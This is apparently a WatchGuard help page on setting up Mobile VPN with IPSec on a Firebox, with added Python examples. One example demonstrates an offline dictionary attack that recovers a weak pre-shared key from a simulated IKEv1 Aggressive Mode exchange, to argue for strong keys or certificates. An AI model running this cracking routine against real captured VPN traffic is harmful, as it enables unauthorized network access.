Configure the Firebox for Mobile VPN with IPSec

You can enable Mobile VPN with IPSec for a group of users you have already created, or you can create a new user group. The users in the group can authenticate either to the Firebox or to a third-party authentication server included in your Firebox configuration.

For more information about how to add users to a group for local Firebox authentication, see Add Users to a Firebox Mobile VPN Group. If you use a third-party authentication server, follow the instructions in the documentation from the manufacturer.

To limit mobile VPN connections to devices that follow corporate policy, you can use Endpoint Enforcement. Before you enable Endpoint Enforcement for Mobile VPN with IPSec groups in the Authentication > Servers configuration, enable and configure Endpoint Enforcement at Subscription Settings > Endpoint Enforcement (Fireware v12.9 or higher). In Fireware v12.5.4 to v12.8.x, enable and configure this feature at Subscription Settings > TDR Host Sensor Enforcement.

For more information about Endpoint Enforcement, see About Network Access Enforcement with the TDR Host Sensor.

For information about how to enable Endpoint Enforcement for IPSec groups, see Add Users to a Firebox Mobile VPN Group.

The IKEv1 Aggressive Mode vulnerability described in CVE-2002-1623 affects Mobile VPN with IPSec: in Aggressive Mode the responder sends a hash derived from the pre-shared key before the exchange is encrypted, so anyone who captures the exchange can guess the pre-shared key offline, without further contact with the Firebox. We recommend that you configure a certificate instead of a pre-shared key if you have a WSM Management Server. If you do not have a Management Server, we recommend that you specify a long, random pre-shared key and change it on a regular basis. We also recommend that you specify a strong hashing algorithm such as SHA-256.
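The following added example (not WatchGuard code) models why the pre-shared key recommendation above matters. It applies the RFC 2409 Aggressive Mode derivation, SKEYID = prf(PSK, Ni_b | Nr_b) and HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b), with HMAC-SHA-256 as the prf, then runs an offline dictionary attack against a captured HASH_R. The nonces, DH public values, cookies, SA body and group ID are constructed placeholders; the wordlist and the group name `mvpn-users` are assumptions for illustration.

```python
"""Why a weak pre-shared key is fatal in IKEv1 Aggressive Mode (CVE-2002-1623).

Added example, not WatchGuard code. It models the RFC 2409 derivation
    SKEYID = prf(PSK, Ni_b | Nr_b)
    HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b)
with prf = HMAC over the negotiated hash (SHA-256 here, as the page
recommends). Nonces, DH values, cookies, SA body and responder ID are
constructed placeholders: the attack needs only that they are visible
on the wire, which in Aggressive Mode they are.
"""
import hmac
import os
from dataclasses import dataclass
from typing import Iterable, Optional


@dataclass(frozen=True)
class AggressiveModeCapture:
    """Fields an eavesdropper sees in Aggressive Mode messages 1 and 2."""
    hash_name: str
    ni: bytes        # initiator nonce
    nr: bytes        # responder nonce
    gxi: bytes       # initiator DH public value
    gxr: bytes       # responder DH public value
    cky_i: bytes     # initiator cookie (ISAKMP SPI)
    cky_r: bytes     # responder cookie
    sai_b: bytes     # body of the initiator's SA payload
    idir_b: bytes    # body of the responder's ID payload
    hash_r: bytes    # responder's authentication hash, sent unencrypted


def skeyid(psk: bytes, ni: bytes, nr: bytes, hash_name: str) -> bytes:
    """SKEYID for pre-shared-key authentication (RFC 2409 section 5.4)."""
    return hmac.new(psk, ni + nr, hash_name).digest()


def compute_hash_r(psk: bytes, c: AggressiveModeCapture) -> bytes:
    """HASH_R exactly as the responder computes it before sending message 2."""
    key = skeyid(psk, c.ni, c.nr, c.hash_name)
    msg = c.gxr + c.gxi + c.cky_r + c.cky_i + c.sai_b + c.idir_b
    return hmac.new(key, msg, c.hash_name).digest()


def simulate_exchange(psk: bytes, group_id: bytes,
                      hash_name: str = "sha256") -> AggressiveModeCapture:
    """On-wire view of an Aggressive Mode exchange for this PSK.

    Random bytes stand in for nonces and DH public values (constructed,
    not a real Diffie-Hellman computation); only their visibility matters.
    """
    fields = dict(
        hash_name=hash_name,
        ni=os.urandom(32), nr=os.urandom(32),
        gxi=os.urandom(256), gxr=os.urandom(256),
        cky_i=os.urandom(8), cky_r=os.urandom(8),
        sai_b=b"\x00\x00\x00\x01" + b"\x00" * 40,   # placeholder SA body
        idir_b=group_id,                              # placeholder ID body
        hash_r=b"",
    )
    fields["hash_r"] = compute_hash_r(psk, AggressiveModeCapture(**fields))
    return AggressiveModeCapture(**fields)


def guess_psk(capture: AggressiveModeCapture,
              candidates: Iterable[bytes]) -> Optional[bytes]:
    """Offline dictionary attack: recompute HASH_R for each candidate PSK.

    No further packets to the Firebox are needed, so lockouts and rate
    limits never trigger; only the key's entropy limits the attacker.
    """
    for candidate in candidates:
        if hmac.compare_digest(compute_hash_r(candidate, capture), capture.hash_r):
            return candidate
    return None


# Constructed wordlist; a real attacker would use millions of entries.
WORDLIST = [b"password", b"vpn2024", b"watchguard", b"Firebox!", b"ipsec-psk"]


def demo():
    """Weak PSK falls to the wordlist; a 32-byte random PSK does not."""
    weak = simulate_exchange(b"watchguard", b"mvpn-users")
    strong = simulate_exchange(os.urandom(32).hex().encode(), b"mvpn-users")
    return guess_psk(weak, WORDLIST), guess_psk(strong, WORDLIST)


if __name__ == "__main__":
    found, not_found = demo()
    print("weak PSK recovered:", found)
    print("strong PSK recovered:", not_found)
```

Switching the prf to SHA-256 only makes each guess marginally more expensive; it does not close the hole, because the attacker still has every input except the key. A long random key pushes the search out of reach, and certificate authentication removes the pre-shared key from the derivation altogether, which is why the page prefers it where a Management Server is available.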

Configure a Mobile VPN with IPSec Group

To configure Mobile VPN with IPSec for a group of users, you add a Mobile VPN with IPSec group configuration.

When you add a Mobile VPN with IPSec group, a Mobile VPN with IPSec Any policy is automatically created to allow all traffic from users in the group to the resources available through the tunnel. For more information about Mobile VPN with IPSec policies, see Configure Policies to Filter IPSec Mobile VPN Traffic.

Users who are members of the group you create are not able to connect until they import the correct configuration file in their WatchGuard IPSec Mobile VPN Client software. You must generate the configuration file and then provide it to the end users. For more information, see Generate Mobile VPN with IPSec Configuration Files.

Troubleshoot Mobile VPN with IPSec

If users cannot connect to the VPN or to network resources, check for these common causes:

  • Incorrect DNS settings
  • Disabled or deleted policies
  • Incorrect user group settings
  • IP address pool overlap
  • Incorrect route settings
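Two of the causes above, IP address pool overlap and incorrect routes, are easy to check before users report them. The following is an added example (not WatchGuard code) that flags a virtual IP pool which overlaps a network behind the Firebox or a typical remote-client LAN, and tunnelled resources that collide with a client's own LAN. The network values in `COMMON_CLIENT_LANS` and in the usage section are constructed samples; substitute the Firebox's trusted and optional networks and the pool from the group configuration.

```python
"""Check a Mobile VPN with IPSec virtual IP pool and allowed resources
for address overlaps that break client connectivity.

Added example, not WatchGuard code. Networks below are constructed samples.
"""
import ipaddress
from typing import Iterable, List, Tuple

# Ranges remote clients commonly sit on at home or in small offices.
# If the pool or a tunnelled resource shares one, the client's local route
# and the VPN route compete (constructed list; extend for your user base).
COMMON_CLIENT_LANS = ("192.168.0.0/24", "192.168.1.0/24", "10.0.0.0/24")


def find_pool_conflicts(virtual_ip_pool: str,
                        firebox_networks: Iterable[str],
                        client_lans: Iterable[str] = COMMON_CLIENT_LANS
                        ) -> List[Tuple[str, str]]:
    """Return (reason, network) for every network the pool overlaps.

    Pool addresses that also exist behind the Firebox are unroutable from
    the inside; pool addresses that match a client's LAN break the client.
    """
    pool = ipaddress.ip_network(virtual_ip_pool, strict=False)
    conflicts: List[Tuple[str, str]] = []
    for net_str in firebox_networks:
        net = ipaddress.ip_network(net_str, strict=False)
        if pool.overlaps(net):
            conflicts.append(("overlaps Firebox network", str(net)))
    for net_str in client_lans:
        net = ipaddress.ip_network(net_str, strict=False)
        if pool.overlaps(net):
            conflicts.append(("overlaps likely client LAN", str(net)))
    return conflicts


def find_resource_conflicts(allowed_resources: Iterable[str],
                            client_lans: Iterable[str] = COMMON_CLIENT_LANS
                            ) -> List[Tuple[str, str]]:
    """Return (resource, client_lan) pairs where a tunnelled resource collides
    with a client's own LAN, so the client resolves it locally, not via VPN."""
    lans = [ipaddress.ip_network(l, strict=False) for l in client_lans]
    conflicts: List[Tuple[str, str]] = []
    for res_str in allowed_resources:
        res = ipaddress.ip_network(res_str, strict=False)
        for lan in lans:
            if res.overlaps(lan):
                conflicts.append((str(res), str(lan)))
    return conflicts


if __name__ == "__main__":
    # Constructed sample Firebox: trusted 10.0.1.0/24, optional 10.0.2.0/24.
    firebox_nets = ["10.0.1.0/24", "10.0.2.0/24"]
    for pool in ("192.168.1.0/24", "10.0.1.128/25", "172.31.250.0/24"):
        print(pool, "->", find_pool_conflicts(pool, firebox_nets) or "ok")
    print("resources ->", find_resource_conflicts(["192.168.1.0/24", "10.0.1.0/24"]) or "ok")
```

Pick the pool from a range that is unused both behind the Firebox and on the networks your users connect from; a dedicated, otherwise unused private block is simplest. Resources that collide with common client LANs can only be fixed by renumbering the resource or forcing all traffic through the tunnel.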

For more troubleshooting information, see Troubleshoot Mobile VPN with IPSec.

See Also

Generate Mobile VPN with IPSec Configuration Files

Configure Windows Server 2016 or 2012 R2 to authenticate mobile VPN users with RADIUS and Active Directory in the WatchGuard Knowledge Base